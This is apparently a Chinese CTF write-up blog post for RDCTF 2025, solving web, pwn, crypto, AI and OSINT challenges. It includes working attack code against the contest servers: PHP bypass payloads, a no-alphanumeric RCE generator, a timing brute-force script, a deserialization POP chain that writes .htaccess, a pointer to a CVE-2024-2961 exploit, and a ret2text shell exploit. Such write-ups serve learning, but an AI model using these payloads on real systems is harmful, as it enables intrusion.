RDCTF_wp

Web

web也会有签到

打开网站

![test](RDCTF-wp/image 2.png)
图片引用

ctrl + u看源码 得到ZmxhZ3swZWZhOTk0ODRiZjVlZGQ3YzE5OGU4M2FjYjQ5ZWJkMn0=

linux 解码

![图片引用](RDCTF-wp/image 1.png)

![图片引用](RDCTF-wp/image 1.png)

flag{0efa99484bf5edd7c198e83acb49ebd2}

竟然是Warmup?

网页源码

![图片引用](RDCTF-wp/image 2 2.png)

level-1 : md5弱等 找两个md5值0e开头的字符串就可以

![图片引用](RDCTF-wp/image 3.png)

?NLhead=s878926199a&NLhand=s155964671a

level-2 : 换行符绕过

![图片引用](RDCTF-wp/image 4.png)

?NLhead=s878926199a&NLhand=s155964671a&Nai[Long.body=fat%0a

level-3 : 无字符RCE 直接脚本梭哈

1
2
3
4
5
6
7
8
<?php
//在命令⾏中运⾏
/*author yu22x*/
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';

![图片引用](RDCTF-wp/image 5.png)

![图片引用](RDCTF-wp/image 6.png)

flag : RDCTF{7h1s-1s-0-f10g-1m-0-NL}

nailong在哪里

打开网站访问nailong.php

![图片引用](RDCTF-wp/image 7.png)

根据报错判断POST传参file 伪协议读一下nailong.php源码

![图片引用](RDCTF-wp/image 8.png)

cyberchef解码

![图片引用](RDCTF-wp/image 9.png)

发现是简单的文件包含漏洞 尝试读/flag

![图片引用](RDCTF-wp/image 10.png)

![图片引用](RDCTF-wp/image 11.png)

解码后访问真奶龙.php 读源码

![图片引用](RDCTF-wp/image 12.png)

![图片引用](RDCTF-wp/image 13.png)

根据提示cve 在网上搜到了CVE-2024-2961 解析复现网址https://cloud.tencent.com/developer/article/2429454

直接找到脚本https://github.com/ambionics/cnext-exploits

![图片引用](RDCTF-wp/image 14.png)

成功后访问shell.php

flag{61b012fb-dbe9-4c1c-8646-d1538fa6681e}

frank1q22来送礼物了

第一步是basectf 2024原题

第一个if 用data伪协议绕过

data://text/plain,frank1q22

![图片引用](RDCTF-wp/image 15.png)

第二个if用@隔断

![图片引用](RDCTF-wp/image 16.png)

访问nlrce.php

![图片引用](RDCTF-wp/image 17.png)

过滤了很多 也不能出网 之前看到的小trick

![图片引用](RDCTF-wp/image 18.png)

flag{00acf3a5-7962-4ab4-b890-0e3b362b7cb7}

wc,是php

![图片引用](RDCTF-wp/image 19.png)

脚本爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests

url = 'http://ctf.wdsec.com.cn:32913/frank1q22-levelLEVEL1.php'


passwd = '65510000'
tables = '0123456789'

for i in range(1, 9):
    for j in tables:
        passwd = passwd[:i - 1] + j + passwd[i:]
        r = requests.post(url, data={'pass': passwd})
        if 'The final' in r.text:
            print(r.text)
            exit(0)
        if r.elapsed.total_seconds() >= i:
            print("第{}位为{}".format(i, j))
            break

![图片引用](RDCTF-wp/image 20.png)

接着访问FRANK1Q22-LEVELlevel2.php

![图片引用](RDCTF-wp/image 21.png)

preg_match执行命令

flag{49bfdb7c-b3c4-411f-8709-8e0c143ec33b}

Hard_pop

比较难绕过的一道伪协议+死亡绕过

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
Class wing{
    public $k3nt0n = "php://filter/string.strip_tags/?>php_value auto_prepend_file /flag\0a\23/resource=.htaccess"; 
    public function __call($name, $arguments){
        if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->k3nt0n)){
            die('Maybe try one more time,she\'ll be back.Go & Get Her.');
        }
        echo "You'll Be Success";
        file_put_contents($this->k3nt0n,"<?php exit();".$this->k3nt0n);
        echo "perfect!";
    }
}

Class loves{
    public $sivan = "data://text/plain,Welcome To RDCTF 2025";
    public $wx;
    public function __destruct(){
        if(isset($this->sivan)&&file_get_contents($this->sivan)=='Welcome To RDCTF 2025'){
            echo "Passed~";
            $this->wx->source;
        }
    }
    public function __invoke()
    {
        echo $this->wx;
    }
}

Class WX{
    public $POP;
    public function __get($name){
        $Challenge = $this->POP;
        return $Challenge();
    }

    public function __toString(){
        $this->POP->CanIGetYourHeart();
        return "Soon~";
    }
}
$a = new loves();
$a -> wx = new WX();
$a -> wx -> POP = new loves();
$a -> wx -> POP -> wx = new WX();
$a -> wx -> POP -> wx -> POP = new wing();
echo serialize($a);
?>

需要多发几次才能出flag

PWN

无痛Pwn之路

复现的时候远程连不上了 直接本地打吧

![图片引用](RDCTF-wp/image 22.png)

直接发送

1
payload = b"\x01\x02\x03\x04"

![图片引用](RDCTF-wp/image 23.png)

可以看到已经执行了 cat flag命令 打通了

ret2text

简单的ret2text 看一下保护

![图片引用](RDCTF-wp/image 24.png)

只有堆栈不可执行 64位程序 ida打开

![图片引用](RDCTF-wp/image 25.png)

main函数反编译 很明显read栈溢出漏洞 offset是0x20 + 0x8 offset = 0x20 +0x8

然后寻找了一下发现后门函数

![图片引用](RDCTF-wp/image 26.png)

地址0x4011B7 由于64位程序考虑栈对齐 所以backdoor = 0x4011B7 + 1

最后exp

1
2
3
4
5
6
7
8
9
from pwn import *
context(os = "linux" , arch = 'amd64', log_level = "debug")
sh = remote("ctf.wdsec.com.cn" , 32935)
# sh = process("./ret2text")
backdoor = 0x4011B7 + 1
offset = 0x20 + 0x8
payload = b'A' * offset + p64(backdoor)
sh.sendlineafter(b'please input:\n',payload)
sh.interactive()

成功拿到shell

![图片引用](RDCTF-wp/image 27.png)

flag{f7cd5ac9-d515-49b6-bb4d-c2258ed60443}

Crypto

Hello_Crypto

claude一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from Crypto.Cipher import AES
import binascii

# 密文
ciphertext = binascii.unhexlify('26a8191576aa59308f9ff3469bebbd0c8d27820531130dfe1a860e1e7b02bd7495f56b3d3d5e9a12c01c4f853693e16c')

# 密钥和IV
key = binascii.unhexlify('1234567890abcdef1234567890abcdef')
iv = binascii.unhexlify('1234567890abcdef1234567890abcdef')

# 创建AES-CBC解密器
cipher = AES.new(key, AES.MODE_CBC, iv)

# 解密
plaintext = cipher.decrypt(ciphertext)

# 输出结果
print("解密结果(hex):", binascii.hexlify(plaintext).decode())
print("解密结果(ascii):", plaintext.decode('ascii', errors='ignore'))

得到 ZmxhZ3tXM2xjMG0zX1QwX1RIM19DcnlwVDBfVzBybGR9

base64解码

flag{W3lc0m3_T0_TH3_CrypT0_W0rld}

Login

deepseek一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from Crypto.Util.number import *

# 已知数据
c = "byqo{A31k0kl_m0_YODPS}"
fake_key = "76e6f6c69616e6968637f677"

# 还原 key
key_hex = fake_key[::-1]  # 反转 fake_key
key_bytes = bytes.fromhex(key_hex)  # 转换为字节
key = key_bytes.decode()  # 解码为字符串
print(f"Recovered key: {key}")

# 字母表
alpha1 = 'abcdefghijklmnopqrstuvwxyz'
alpha2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

# 将 key 转换为数字列表
key_nums = []
for i in key:
    if i in alpha1:
        key_nums.append(alpha1.find(i))
    elif i in alpha2:
        key_nums.append(alpha2.find(i))

# 解密函数
def decrypt(ciphertext, key_nums):
    pointer = 0
    plaintext = ''
    for i in ciphertext:
        if i in alpha1:
            # 异或 pointer 得到 new_index
            new_index = alpha1.find(i) ^ pointer
            # 减去 key_nums[pointer] 并取模 26
            original_index = (new_index - key_nums[pointer]) % 26
            plaintext += alpha1[original_index]
            pointer = (pointer + 1) % len(key_nums)
        elif i in alpha2:
            # 异或 pointer 得到 new_index
            new_index = alpha2.find(i) ^ pointer
            # 减去 key_nums[pointer] 并取模 26
            original_index = (new_index - key_nums[pointer]) % 26
            plaintext += alpha2[original_index]
            pointer = (pointer + 1) % len(key_nums)
        else:
            plaintext += i
    return plaintext

# 解密
flag = decrypt(c, key_nums)
print(f"Decrypted flag: {flag}")

flag{W31c0me_t0_RDCTF}

AI

猫粮

输入where is flag

RDCTF{Y0u_L1e_Th3_41_7d257664eaa4}

Osint

图寻①

朱可夫元帅雕像 最后好像是地图缩小了一点 得到的坐标才是正确的

我也不确定这个正不正确了 太久了

flag{d0ed18d3d8fc0cf3aac3d8339c8dd86f}

Web
#CTF
RDCTF_wp
http://st3r665.github.io/2025/03/04/RDCTF-wp/
作者
St3r
发布于
2025年3月4日
许可协议